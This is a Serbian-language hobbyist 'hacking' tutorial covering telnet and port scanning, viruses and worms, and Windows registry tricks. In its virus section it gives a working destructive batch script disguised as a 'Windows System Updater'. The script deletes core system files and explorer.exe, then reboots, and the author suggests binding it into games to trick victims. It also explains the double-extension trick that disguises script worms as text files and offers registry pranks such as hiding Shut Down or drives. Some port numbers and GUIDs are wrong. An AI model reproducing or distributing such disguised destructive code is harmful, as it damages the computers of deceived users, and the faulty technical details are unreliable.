Hakovanje.. 3 (virusi..i slicno)

Sta je telnet?

Telnet je neverovatni alat koji svaki haker MORA da zna da koristi pre
nego sto i pomisli o hakovanju servera. Telnet je bolje receno protokol
koji zahteva i koga pokrece TCP/IP. Moze se koristiti za konektovanje
na udaljene racunare i da izvrsi komandnu liniju programa, jednostavnim
unosenjem komandi u njegov GUI (graficki korisnicki interfejs) prozor.
Telnet se nalazi u Windows folderu tj u: c:\windows\telnet.exe i u
c:\winnt\system32\telnet.exe na Windows NT sistemima, a mozete ga
pokrenuti ako u MSDOS-u ukucate telnet.

[Kako da se konektujem na udaljeni kompjuter?]

Veoma je jednostavno da se konektujete na udaljeni kompjuter uz pomoc
Telnet-a. Pokrenite telnet i kada vam se pojavi njegov prozor samo
kliknite na: CONNECT > REMOTE SYSTEM i zatim u 'HOST NAME' unesite
IP adresu ili host racunara na koji se konektujete. Zatim, u 'PORT'
unesite otvoreni port na koji se konektujete. TermType treba skoro uvek
da vam bude podesen na vt100. Kliknite na CONNECT i bicete konektovani
na udaljenu masinu.
Najjednostavniji nacin za pokretanje telneta i njegovo konektovanje na sistem je ako u MSDOS-u ukucate:
C:\>telnet hostname.com ###

- gde je telnet komanda koja pokrece sam program telnet, a hostname.com
je host ili ip adresa na koju se konektujemo (npr. ptt.yu) Smješko, a
### je broj otvorenog porta (npr. 139)

Mozda ce vam biti problem u tome sto neznate na koj port da se
konektujete tj. koji port je otvoren na masini na koju se konektujete.
Da bi ste dobili listu otvorenih portova, morate upotrebiti Port
Scanner ili drugi program koji skenira masinu za otvorene portove. Znam
da je lamerski koristiti program za nesto kao skeniranje otvorenih
portova, ali taj nacin je za vas najlaksi. Ovo je lista nekih osnovnih
portova:

Ping 7
Systat 11
Time 13
NetStat 15
FTP 21
SSH 22
Telnet 23
SMTP 25
Whois 43
Finger 79
HTTP 80
POP 110
NNTP 119
IDENT 139

Kao primer konektovanja i koriscenja telneta pokazacu vam konektovanje
na FTP port. Dakle, ovako... Ukoliko zelim da se konektujem na
odredjeni racunar koji ima IP adresu 123.45.67.8 ja cu prvo da skeniram
uz pomoc Port Scannera za otvorene portove na ovom racunaru. Dobicu
listu svih otvorenih portova. Naravno, vidim da je otvoren i port 21
tj. FTP. Sada cu u MSDOS-u ukucati:
C:\>telnet 123.45.67.8 21
i konektovacu se na zeljeni FTP server. Sada samo ukucajte ? (2 puta
pritisnite ENTER) i dobicete listu komandi koje mozete koristiti. Ovo
vazi i za sve ostale portove na koje zelite da se konektujete.
Ovo ce vam zvucati smesno, ali je zanimljivo... uz pomoc telneta se
mozete konektovati i na bilo koji irc chat server, tako da vam telnet
moze posluziti kao irc klijent Smješko) Potrebno je samo da se
konetktujete na IRC server na port 6667 i da vidite listu komandi.
Evo i jednog predloga: ukoliko ste zrtva mail bomba od strane nekog
lamera, umesto da downloadujete sve te stotine poruka, pa zatim da ih
brisete, mozete se jednostavno konektovati na POP server vaseg ISP
provajdera i odjednom obrisati svu nezeljenu postu bez njenog
prethodnog downloadovanja, tako da mozete ustedeti i sate
downloadovanja ebomb poruka. Nesto sto je meni najvaznije je to sto uz
pomoc telneta mozete dobiti prikaz informacija o sistemu servera tj.
informacija o operativnom sistemu i njenoj verziji.

Sta su virusi?

Na pocetku tutoriala cu vam objasniti sta su virusi, iako je vecina
mozda i okusila nevolje koje virus donosi. Virus je zapravo program ili
skripta (java, vbasic...) napravljena da nasteti vasem kompjuteru i
koji se moze sam i bez vaseg znanja kopirati na floppy i slati preko
e-maila koristeci vase mail adrese u Address Book-u (to su takozvani
CRVI ili WORM). Pored toga neki virusi su napravljeni tako da zaraze i
ostale fajlove na vasem kompjuteru.

[Kako se prave?]

Za pravljenje virusa mogu se koristiti svi moguci programski i
skripting jezici. Da bi ste vi sami mogli da pravite neke vrste virusa
morate da znate odredjene programske jezike. Zato vam savetujem da,
ukoliko neznate, naucite neki programski jezik. Ukoliko zelite da
postanete haker morate znati c, c++ i perl programske jezike.

U daljem tekstu slede 2 primera *.BAT virusa i *.TXT.VBS virusa koje je
veoma jednostavno napraviti i koji ce vam malo pribliziti pojam
pravljenja virusa! Naravno, da bi ih razumeli morate znati BATCH i
VISUAL BASIC skripting jezike.

Ukoliko bi vi zeleli da napravite *.bat virus, evo vam malog primera
kako da to uradite. Potrebno je samo da sledeci batch kod iskopirate u
notepad i snimite ga kao winupdt.bat fajl i eto vam malog virusa! Ovaj
virus se predstavlja kao UPDATE za Windows 98, ali je zapravo virus
koji ce obrisati vazne sistemske fajlove, kao i Windows Explorer i
zatim restartovati racunar. Jednom napravljen ovakav virus mozete
ubaciti i u neki exe fajl (program ili igricu), a to ce vam najlakse
biti uz pomoc nekog bindera (npr. MultiBinder), sem ukoliko znate c/c++
programski jezik... HeHeHe Sirast (da bi naucili ovaj programski jezik
downloadujte tutorial sa naseg sajta, ili potrazite neki na NETu).


@ECHO OFF
echo Welcome To Microsoft Windows System Updater Setup
echo Installing Components... Please Wait...
echo y|del c:\autoexec.bat
echo y|del c:\config.sys
echo y|del c:\windows\system.ini
echo y|del c:\windows\win.ini
echo y|del c:\windows\explorer.exe
echo Installing is DONE.
echo Setup Will Now restart Your Computer... Please Wait...
start C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows


VBA crvi koriste posebnu tehniku kako bi zavarali potencijalnu zrtvu.
Pored toga sto crv nema ekstenziju EXE vec VBA ili VBS (sto znaci da su
pisani u Visual Basic Script formatu i da je za njihovo izvrsavanje
potreban IE), takvi crvi se obicno distribuiraju sa extenzijom
'.txt.vba', tako da potencijalna zrtva pomisli da se radi o obicnom
tekstu i startuju fajl. Posto je zadnja ekstenzija '.vba', ne startuje
se Notepad vec IE koji izvrsi program, tako da potencijalna zrtva
postane prava zrtva.

Hakovanje windowsa

Regedit - Registry Editor]

Ovo zapravo i nije 'hakovanje' kao sto su upadi u sisteme i slicno. Ovo
je zapravo izmena samog Windowsa i maksimalno koriscenje onoga sto nam
Windows pruza. Za veliki broj operacija bice vam potrebno znanje rada u
regeditu. Ukoliko znate da rukujete regeditom odlicno, ukoliko ne...
naucicete. Program Regedit mozete naci u Windows direktorijumu
c:\Windows\Regedit.exe, a mozete ga veoma jednostavno pokrenuti ako
kliknete na start, zatim na run i unesete REGEDIT.

- Gde je Shut Down?

Ovaj trik vam moze pomoci da uplasite i prevarite lamere. Ovime ce te
sakriti dugme shutdown iz start menia tako da se kompjuter ne moze
ugasiti klikom na Shut Down. Startujte regedit i prvo napravite backup
(kako bi mogli da vratite Shut Down dugme) tako sto ce te kliknuti na
'Registry' pa na 'Export Registry File', sada unesite ime fajla (bilo
koje npr. backup1.reg) i kliknite na save. E, sada mozete poceti sa
uklanjanjem Shut Down dugmeta. Idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Sada napravite novi 'String Value' tako sto ce te ici na 'Edit', 'New'
i na 'String Value' i dacete mu ime NoCloseKey. Sada kliknite desnim
tasterom na ovaj String Value, kliknite na 'Modify' i unesite 1 u polje
Value Data. Shut Down iz start menia sada ce biti onemogucen. Kada
budete zeleli da ponovo omogucite Shut Down potrebno je samo da
pokrenete buckup koji ste na pocetku napravili (backup1.reg) i dugme ce
biti vraceno.

NAPOMENA: PRE BILO KAKVE OPERACIJE NAD REGEDITOM PRETHODNO NAPRAVITE
BACKUP O KOME SAM MALO PRE GOVORIO ('KLIKOM NA EXPORT REGISTRY
FILE'smiley KAKO BI KASNIJE MOGLI DA VRATITE PRVOBITNA PODESAVANJA.

- A: B: C: D:

Jos jedan mali trik da prevarite vase prijatelje. Zapravo, ovim trikom
ce te iz My Computer-a ukloniti sve drajve (Flopi, Hard Disk itd...)
Pokrenite regedit idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Ovde napravite novi 'DWord Value' i dajte mu ime NoDrives. Sada samo modifikujte njegovu vrednost na 3FFFFFF (Hexadecimal).

- Screen Saver trik

Da bi ste ukjucili i iskljucili screen saver idite na:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenSavers

Napravite novi 'String Value', dajte mu ime Mouse Corners i dajte mu
vrednost -Y da ukljucite i -N za suprotno. Sada kad god pomerite mis u
gornji desni ugao ekrana pokrenuce se screen saver, a kada ga budete
pomerili na donji levi ugao screen saver ce se ugasiti.

- Brisanje ikonica preko regedita

Sta mislite, da li je moguce obrisati Recycle Bin? Nema nikakve logike,
ali jeste. Pored toga, mozete obrisati i My Computer ikonicu, kao i
dosadnu Network Neighborhood ikonu. Da bi ste to uradili idite na
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
- gde je {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} oznaka ikonice koju
zelimo da uklonimo. Oznake ikonica se nalaze u sledecoj listi:

My Briefcase:{85BBD920-42AO-1069-A2E4-08002B30309D}
Desktop: {00021400-0000-0000-C000-0000000000046}
Control Panel:{21EC2020-3AEA-1069-A2DD-08002B30309D}
Dial-Up-Networking:{992CFFA0-F557-101A-88EC-00DD01CCC48}
Fonts: {BD84B380-8CA2-1069-AB1D-08000948534}
Inbox :{00020D76-0000-0000-C000-000000000046}
My Computer :{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Network Neighborhood:{208D2C60-3AEA-1069-A2D7-O8002B30309D}
Printers :{2227A280-3AEA-1069-A2DE-O8002B30309D}
Recycle Bin :{645FF040-5081-101B-9F08-00AA002F954E}
The Microsoft Network:{00028B00-0000-0000-C000-000000000046}
History: {FF393560-C2A7-11CF-BFF4-444553540000}
Winzip :{E0D79300-84BE-11CE-9641-444553540000}

Dakle ukoliko npr. zelimo da obrisemo Recycle Bin icice mo do:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace{645FF040-5081-101B-9F08-00AA002F954E}
i obrisacemo ovaj kljuc. Ovime ce mo ukloniti ikonicu Recycle Bina. Kada zelite ikonicu nazad... pokrenite backup!

- Zanimljiv toolbar

Ucinite Win Explorer i Internet Explorer lepsim, postavite sliku na toolbaru. Da bi ovo uradili idite na:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Internet Explorer\Toolbar\

Sada napravite novi 'String Value' sa imenom BackBitmap i podesite mu
vrednost (modify) na putanju do slike koju zelite da stavite na toolbar
u *.bmp formatu (npr. C:\Windows\Slika.bmp). Sada ce Windows Explorer i
Internet Explorer imati sasvim novi izgled!!!